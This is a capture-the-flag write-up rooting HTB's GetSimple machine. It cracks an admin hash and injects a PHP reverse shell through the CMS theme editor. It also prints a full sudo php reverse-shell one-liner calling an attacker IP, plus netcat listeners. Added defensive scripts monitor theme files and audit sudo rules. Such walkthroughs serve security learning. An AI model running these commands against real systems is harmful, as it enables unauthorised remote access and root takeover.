R.A.V.E.N. Exploit Walkthrough: Rooting GetSimpleCMS via Theme Template Injection


Welcome to another breakdown in the R.A.V.E.N. series — a branded, modular approach to privilege escalation. Today, we're dissecting a black box engagement on HTB’s “GetSimple” machine, where remote exploitation leads to root access through theme template manipulation in a flat-file CMS.
Reconnaissance: Mapping the Terrain
Our initial scans painted a predictable picture:
- nmap flagged open ports: 22 (OpenSSH) and 80 (Apache httpd).
- nikto discovered /admin.xml, containing a hash, nested inside /data/users/.
- gobuster confirmed relevant directories: /admin/, /data/.
- curl scraping gave no extra intel in the source code.
Credentials Unearthed
Extracted hash:
d033e22ae348aeb5660fc2140aec35850c4da997
Cracked with Hashcat using rockyou:
echo 'd033e22ae348aeb5660fc2140aec35850c4da997' > hash.txt
hashcat -m 100 -a 0 hash.txt /usr/share/wordlists/rockyou.txt
Result: admin:admin
Initial Foothold: Bypassing Upload Restrictions
Login access to /admin yielded no direct file upload functionality — and GetSimpleCMS refused to parse PHP within page content. Enter the workaround: using the Theme Editor.
Injected PentestMonkey's PHP reverse shell into a .php file under the active theme. With a netcat listener (nc -lnvp 5555) running, a quick page refresh dropped us into the box.
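The Theme Editor route works because the CMS lets an authenticated admin write arbitrary PHP into theme files that the web server then executes as code. On the defending side the practical control is to notice when a theme file changes outside a deployment. The script below is an added example, not code from this post or from GetSimpleCMS: it records the SHA-256 of every .php file under a theme directory, reports files that were added or modified since the baseline, and greps templates for functions a display template has no reason to call. The theme path, the function watchlist and the files created by the demo are constructed assumptions; point the directory argument at the real theme directory of your install.

```shell
#!/bin/sh
# Added example (not from the original post or from GetSimpleCMS):
# integrity and content checks for a CMS theme directory. The demo paths,
# sample template and watchlist below are constructed for illustration.

# baseline_theme DIR OUT : record the SHA-256 of every .php file under DIR
baseline_theme() {
    find "$1" -type f -name '*.php' -exec sha256sum {} + | sort > "$2"
}

# check_theme DIR BASELINE : print "NEW <file>" for a .php file that is not in
# the baseline and "CHANGED <file>" for one whose hash differs.
# Returns 1 if anything was reported, else 0. Assumes paths without whitespace.
check_theme() {
    dir=$1; base=$2; status=0
    for f in $(find "$dir" -type f -name '*.php'); do
        cur=$(sha256sum "$f" | cut -d' ' -f1)
        old=$(grep " $f\$" "$base" | cut -d' ' -f1)
        if [ -z "$old" ]; then
            echo "NEW $f"; status=1
        elif [ "$cur" != "$old" ]; then
            echo "CHANGED $f"; status=1
        fi
    done
    return $status
}

# flag_suspicious DIR : list .php files under DIR that reference functions a
# display template has no business using (constructed watchlist; extend it).
# Prints nothing and returns 1 when there are no hits.
flag_suspicious() {
    grep -rlE 'fsockopen|proc_open|shell_exec|passthru|eval\(' --include='*.php' "$1"
}

# demo_theme_check : build a throwaway theme, baseline it, simulate an edit
# and a dropped file, and print what the two checks report
demo_theme_check() {
    tmp=$(mktemp -d)
    mkdir "$tmp/theme"
    printf '<?php echo "site header"; ?>\n' > "$tmp/theme/template.php"
    baseline_theme "$tmp/theme" "$tmp/baseline.txt"
    # simulate a template edited through the admin theme editor
    printf '<?php echo "edited header"; ?>\n' > "$tmp/theme/template.php"
    # simulate a new file that opens a socket, which no template needs
    printf '<?php $s = fsockopen("host", 80); ?>\n' > "$tmp/theme/extra.php"
    check_theme "$tmp/theme" "$tmp/baseline.txt" || true
    flag_suspicious "$tmp/theme" || true
    rm -rf "$tmp"
}

# run with "demo" as the first argument to see the checks in action
if [ "${1:-}" = "demo" ]; then demo_theme_check; fi
```

Run `baseline_theme` right after a deployment and `check_theme` from cron or a CI job; any NEW or CHANGED line that does not line up with a known deploy is worth a look, and a hit from `flag_suspicious` in a theme file is a strong signal on its own.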
Shell Upgrade
TTY was unstable post-access, so we upgraded it:
python3 -c 'import pty; pty.spawn("/bin/bash")'
And just like that — user.txt found in /home/<user>.
Privilege Escalation: The Hidden Misconfig
Standard enumeration with LinEnum revealed a gem:
User can sudo /usr/bin/php without password
Root payload:
sudo /usr/bin/php -r '$sock=fsockopen("10.10.14.1",4444);$proc=proc_open("/bin/sh -i",array(0=>$sock,1=>$sock,2=>$sock),$pipes);'
Reverse shell listener:
nc -lnvp 4444
And boom — root.txt retrieved.
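The sudo rule is the entire privilege escalation: a NOPASSWD rule for an interpreter such as php is equivalent to handing out a root shell. As an added example (not code from this post), here is a small audit that parses the text `sudo -l` prints and flags NOPASSWD rules whose command is an interpreter, shell or pager. The sample `sudo -l` output and the list of risky binaries are constructed for the demo; on a real host feed it the live output and extend the list to whatever your environment considers a shell-equivalent.

```shell
#!/bin/sh
# Added example (not from the original post): flag sudo rules that run an
# interpreter or shell without a password. Sample output and watchlist are
# constructed so the check runs offline.

# Constructed sample shaped like real `sudo -l` output
SAMPLE_SUDO_L='Matching Defaults entries for www-data on getsimple:
    env_reset, mail_badpass

User www-data may run the following commands on getsimple:
    (ALL : ALL) NOPASSWD: /usr/bin/php
    (root) /usr/bin/systemctl restart apache2
    (ALL) NOPASSWD: /usr/bin/less'

# Binaries whose NOPASSWD rule effectively grants a root shell
# (constructed watchlist; extend from your own interpreter/pager inventory)
RISKY_BINS='php python python3 perl ruby bash sh vim vi less more awk find'

# audit_sudo_rules TEXT : for every NOPASSWD line in TEXT whose command is on
# the watchlist, print "RISKY <binary> <rule line>". Always returns 0.
audit_sudo_rules() {
    printf '%s\n' "$1" | grep 'NOPASSWD' | while read -r line; do
        cmd=${line##*: }                # text after the last ": " (the command)
        bin=$(basename "${cmd%% *}")    # first word of the command, basename only
        for r in $RISKY_BINS; do
            if [ "$bin" = "$r" ]; then
                echo "RISKY $bin $line"
            fi
        done
    done
    return 0
}

# count_risky TEXT : number of risky rules found (prints 0 when none)
count_risky() {
    audit_sudo_rules "$1" | grep -c . || true
}

# Typical use on a live host: audit_sudo_rules "$(sudo -l 2>/dev/null)"
if [ "${1:-}" = "demo" ]; then
    audit_sudo_rules "$SAMPLE_SUDO_L"
    echo "risky rules: $(count_risky "$SAMPLE_SUDO_L")"
fi
```

Against the sample the audit reports the php and less rules and ignores the systemctl one, which is the distinction that matters: a rule scoped to one service command is a bounded grant, a rule for an interpreter is not. Run it across a fleet by collecting `sudo -l -U <user>` output from each host and the list of hits becomes a remediation queue.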
Key Takeaways
- Flat-file CMSs like GetSimple don’t rely on databases, which shifts your attack surface.
- No file uploads? Try theme injection.
- Don’t ignore hashed credentials in public-facing XML.
- Sudo misconfigurations can be gold — run sudo -l religiously.
Written by Brad Harris